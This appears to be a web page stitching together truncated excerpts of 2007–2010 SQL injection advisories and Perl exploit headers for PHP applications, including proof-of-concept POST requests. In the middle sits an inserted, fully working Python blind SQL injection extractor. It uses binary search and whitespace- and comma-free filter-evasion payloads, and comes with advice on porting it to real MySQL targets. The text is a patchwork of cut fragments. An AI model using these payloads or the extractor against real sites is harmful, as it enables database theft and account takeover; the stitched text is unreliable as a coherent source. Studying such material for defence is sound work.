

SQL Injection attack

[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09

List of found vulnerabilities
===============================================================================

1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
  1. unsanitized user-submitted parameter "origmsg" is used in an SQL query
Preconditions:

Pligg <= 9.9.0 Multiple Vulnerabilities

Description:
Pligg is a popular open source, full-featured content management
system written in PHP. There are a number of vulnerabilities
within Pligg that allow remote file enumeration, file inclusion,
cross-site scripting, and SQL injection. Combined, these issues
allow remote code execution on the affected installation: once admin
credentials are obtained via SQL injection, arbitrary PHP code can be
placed within template files.



[RT-SA-2009-003] IceWarp WebMail Server: SQL Injection in Groupware Component

During a penetration test RedTeam Pentesting discovered multiple
SQL injections in the IceWarp WebMail Server. Attackers who control a
user account for the web-based email and groupware components are
able to execute arbitrary SQL SELECT statements and therefore read any
data in the DBMS that is accessible to the IceWarp eMail Server.



Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Agent

Summary
=======

The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an
authenticated attacker to execute SQL statements that can cause

BLIND SQL INJECTION exploit (GET var 'AlbumID')--RTWebalbum 1.0.462-->

#!/usr/bin/perl
#-----------------------------------------------------------------
#BLIND SQL INJECTION (GET var 'AlbumID')--RTWebalbum 1.0.462-->
#-----------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://rtwebalbum.x12.pl/
#-->DOWNLOAD: http://sourceforge.net/projects/rtwebalbum/
#-->DEMO: http://rtwebalbum.x12.pl/

Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection

- Severity: Moderately High
=============================================

I. VULNERABILITY
-------------------------
Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection
Invision Power Board <= 2.3.6 SQL Injection

II. BACKGROUND
-------------------------
Invision Power Board (IPB) is a professional forum system that has  

Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities

CVE IDs in this security advisory:

1) Authentication bypass - CVE-2010-4279
2) OS Command Injection - CVE-2010-4278
3) SQL Injection - CVE-2010-4280
4) Blind SQL Injection - CVE-2010-4280
5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283


[+] Introduction

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

 Name              phpCollegeExchange
 Vendor            http://phpcollegeex.sourceforge.net
 Versions Affected 0.1.5c

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-11

BLIND SQL INJECTION EXPLOIT--TemaTres 1.0.3-->

#!/usr/bin/perl
#---------------------------------------------------
#BLIND SQL INJECTION EXPLOIT--TemaTres 1.0.3-->
#---------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.r020.com.ar/tematres/
#-->DOWNLOAD: http://sourceforge.net/projects/tematres/
#-->DEMO: http://www.r020.com.ar/tematres/index.php

CLAN TIGER CMS--(module custompage.php) BLIND SQL INJECTION-->

#!/usr/bin/perl
#
#-------------------------------------------------
# (module custompage.php) BLIND SQL INJECTION                        
#-------------------------------------------------
#
# CMS INFORMATION:                              
#
#-->WEB: http://www.clantiger.com
#-->DOWNLOAD: http://www.clantiger.com/download-clan-cms

[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0

a) if web server directory listing is enabled, then the filename can easily be found
b) brute force is possible -> at most ~100 000 tries are needed to guess the filename


###############################################################################
4. SQL Injection in "includes/classes/searchbox.inc.php"
###############################################################################

Reason: failure to sufficiently sanitize user-supplied input data
Attack vector: user submitted GET parameter "max"
Preconditions:

SunShop <= 4.1.4 SQL Injection

# GulfTech Security Research              August 18, 2008
##########################################################
# Vendor : Turnkey Web Tools, Inc
# URL : http://www.turnkeywebtools.com
# Version : SunShop <= 4.1.4
# Risk : SQL Injection
##########################################################


Description:
SunShop shopping cart is a full featured ecommerce solution written

Pooya Site Builder (PSB) SQL Injection Vulnerabilities

########################## www.BugReport.ir #######################################
#
#               AmnPardaz Security Research Team
#
# Title: Pooya Site Builder (PSB) SQL Injection Vulnerabilities
# Vendor: www.paridel.com
# Vulnerable Version: 6.0 (Assembly Version)
# Exploit: Available
# Impact: High
# Fix: N/A

PHP Security Framework: Vuln and Security Bypass

 Released on:   2007/12/16
   Changelog:   2007/12/16

     Summary:   [HT] Remote File Inclusion
                [MT] SQL Injection
                [MT] SQL Injection Protection Bypass
                [__] Conclusion

      Legend:   L - Low risk         M - Medium risk
                H - High risk        T - Tested

(GET var 'id') BLIND SQL INJECTION EXPLOIT --Dog Pedigree Online Database v1.0.1-Beta -->

#!/usr/bin/perl
#
#
#------------------------------------------------------------------------------------------
#(GET var 'id') BLIND SQL INJECTION EXPLOIT --Dog Pedigree Online Database v1.0.1-Beta -->
#------------------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://thewhippetarchives.net/twa_is_offline.php

(Post Form var 'username') BLIND SQLi exploit --S-CMS <= v-2.0 Beta3-->

#-------
#
#Valid username
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/plugin.php?page=your_account.php&mode=passlost HTTP/1.1
#Host: [HOST]
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10

(Post Form login var 'username') BLIND SQLi exploit--Open Biller 0.1-->

#------------
#
#magic quotes=OFF
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/index.php HTTP/1.1
#Host: [HOST]
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10

WysGui CMS 1.2 BETA(Insecure Cookie Handling)--Blind-sql-injection-exploit-->

#
#  CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: N/A
#-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT
#-->AFFECTED VERSION: LAST = 1.2 BETA (Maybe <= ?)
#-->Discovered Bug date: 2009-04-20
#-->Reported Bug date: 2009-04-20
#-->Fixed bug date: Not fixed
#-->Info patch (????): Not fixed

[waraxe-2008-SA#069] - Multiple Sql Injection in vBulletin 3.7.4


Author: Janek Vind "waraxe"
Date: 17. November 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-69.html



BLIND SQL INJECTION--Leap CMS 0.1.4-->

#!/usr/bin/perl
#-----------------------------------------------
#BLIND SQL INJECTION--Leap CMS 0.1.4-->
#-----------------------------------------------
#
#  CMS INFORMATION:
#
#-->WEB: http://leap.gowondesigns.com/
#-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap
#-->CATEGORY: CMS / Lite

[ISecAuditors Security Advisories] WP-Forum <= 2.3 SQL Injection vulnerabilities

- Severity: 8.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities

II. BACKGROUND
-------------------------
WP-Forum is a discussion forum plugin for WordPress. It works with
WordPress 2+ and PHP >= 5.0

BlogMan 0.45 Multiple Vulnerabilities

Application:    BlogMan (http://sourceforge.net/projects/blogman/)
Version:        0.45
Bug:            * Multiple SQL Injection
                * Authentication Bypass
                * Privilege Escalation
Exploitation:   Remote
Date:           1 Mar 2009
Discovered by:  Salvatore "drosophila" Fresta

iScripts SocialWare 2.2.x Multiple Remote Vulnerability

II. DESCRIPTION

This CMS is affected by multiple remote security flaws,
such as SQL Injection, Arbitrary File Upload, etc.
These security flaws DO NOT require authentication. Other
files may be vulnerable.


III. ANALYSIS

Multiple Vulnerabilities in OpenClassifieds 1.7.0.3

good example of this. It's impossible to account for all the ways a variable can be mangled once it
enters a program, and if you sanitize input when it first enters the program there will be cases where it
will become dangerous again. This isn't only a problem for SQLi, it's also a problem for XSS. I am
inserting JS into the database, which isn't a vulnerability, but printing it is persistent XSS.

The blind SQL injection is a bit strange. I can't use white space or commas, which is a pain. I had to
rewrite my general purpose Blind SQLi Class to accommodate. A binary search is used to greatly
speed up the blind SQLi attack.
(which I also used in my php-nuke exploit: http://www.exploit-db.com/exploits/12510/)

 Special thanks to Reiners for this sqli filter evasion cheat sheet: 
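A worked illustration of the binary-search blind extraction and the whitespace/comma-free payload style described in the OpenClassifieds excerpt above. This is an added example, not code from that advisory or from any of the Perl exploits listed on this page. It runs offline against a constructed SQLite in-memory table standing in for the vulnerable script; the table and column names (users, id, username, password), the numeric GET parameter, and the md5 of "password" used as the secret are all assumptions.

```python
import hashlib
import sqlite3

# Constructed target data: the secret the attacker will extract (assumed md5 hash).
SECRET = hashlib.md5(b"password").hexdigest()


class VulnerableApp:
    """Stand-in for a PHP script that pastes a GET parameter into its query and
    renders a different page depending on whether a row came back. Only that
    true/false difference is observable, which is what makes the injection blind."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES(1, 'admin', ?)", (SECRET,))
        self.queries = 0  # counts round trips, to show the cost of the attack

    def page(self, user_id: str) -> bool:
        self.queries += 1
        sql = "SELECT username FROM users WHERE id=" + user_id  # the bug: string concatenation
        return self.db.execute(sql).fetchone() is not None

    def safe_page(self, user_id: str) -> bool:
        """Hardened form: a bound parameter, so the input can never become SQL."""
        self.queries += 1
        row = self.db.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()
        return row is not None


def as_chars(s: str) -> str:
    """Spell a known prefix as char(97)||char(98)||... so the payload needs no
    quotes, whitespace or commas; the empty prefix becomes ''."""
    return "||".join(f"char({ord(c)})" for c in s) if s else "''"


def blind_extract(app: VulnerableApp, column="password", table="users", where="id=1", max_len=64):
    """Recover one column value using only the true/false oracle.

    For a known prefix p, the condition  value >= p||char(m)  holds exactly
    when m <= the next character, so a binary search over printable ASCII
    finds each character in at most 7 queries instead of up to 95. Whitespace
    is replaced by /**/ and no commas appear anywhere in the payload, which is
    what the filter described in the advisory forces."""
    sub = f"(SELECT/**/{column}/**/FROM/**/{table}/**/WHERE/**/{where})"

    def oracle(cond: str) -> bool:
        return app.page(f"1/**/AND/**/{cond}")

    found = ""
    while not oracle(f"{sub}={as_chars(found)}"):       # stop once the prefix is the whole value
        if len(found) >= max_len:
            raise RuntimeError("value longer than max_len or contains non-printable bytes")
        lo, hi = 32, 126                                 # printable ASCII; an assumption about the data
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"{sub}>={as_chars(found)}||char({mid})"):
                lo = mid                                 # next character is >= mid
            else:
                hi = mid - 1                             # next character is < mid
        found += chr(lo)
    return found, app.queries


if __name__ == "__main__":
    target = VulnerableApp()
    value, n = blind_extract(target)
    print(f"extracted {value!r} in {n} requests")
    # The same payload against the parameterised version matches no row at all.
    print("safe_page with payload ->", target.safe_page("1/**/AND/**/1=1"))
```

Two caveats a practitioner should keep in mind when porting this from the SQLite stand-in to a real target. MySQL's default collations are case-insensitive, so `>=` comparisons on a mixed-case value need a `BINARY` cast or the search converges on the wrong case. And this payload sits in a numeric context, so it needs no quote character; the login-form entries later on this page inject into a string context, which is why they list magic_quotes=OFF as a precondition: with magic_quotes_gpc on, the quote needed to break out of the string literal would be escaped.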

Cacti 0.8.7a Multiple Vulnerabilities

multiple data acquisition methods, and user management features out of
the box".
 
II. DESCRIPTION
 
Multiple vulnerabilities exist in Cacti software (XSS, SQL Injection,
Path Disclosure, HTTP Response Splitting).
 
III. ANALYSIS
 
Summary:

[waraxe-2008-SA#062] - Multiple Sql Injections in MyBB 1.2.10


Author: Janek Vind "waraxe"
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-62.html



Hosting Controller - Multiple Security Bugs (Extremely Critical)

1- [Remote Attacker] can log in to the Hosting Controller panel. He can also change all other users' passwords.
2- [User] can copy a file to the Hosting Controller web directory, where it is executed under administrative privilege, so the attacker can execute his commands with administrative privilege; e.g. an attacker can gain a remote desktop session on the server by using this bug to upload an ASP file.
3- [Remote Attacker] can create a new user.
4- [Remote Attacker] can change all users' profiles.
5- [User] can see all the database information via SQL injection.
6- [User] can change his credit amount or increase his discount.
7- [User] can uninstall other users' FrontPage extensions.
8- [User] can delete all gateway information.
9- [User] can enable or disable pay types.
10- [User] can see all usernames on the server via "fp2000/NEWSRVR.asp".

MyCart 2.0 Multiple Remote Vulnerabilities

_____________

Summary:

 A) Multiple Remote Command Execution
 B) Multiple SQL Injection
 C) Multiple Blind SQL Injection
 D) XSS
 

A) Multiple Remote Command Execution

Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities

 Name              Amblog
 Vendor            http://robitbt.hu
 Versions Affected 1.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-10

[MORNINGSTAR-2009-01] Multiple security issues in Open Auto Classifieds version <= 1.5.9

Release Type: Co-ordinated, responsible disclosure


2. Vulnerability Information
----------------------------------------------------------------------------------------------
Class: SQL Injection, Insecure File Upload, Cross Site Scripting, 
Filepath Disclosure
Remotely Exploitable: Yes
Locally Exploitable: No




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
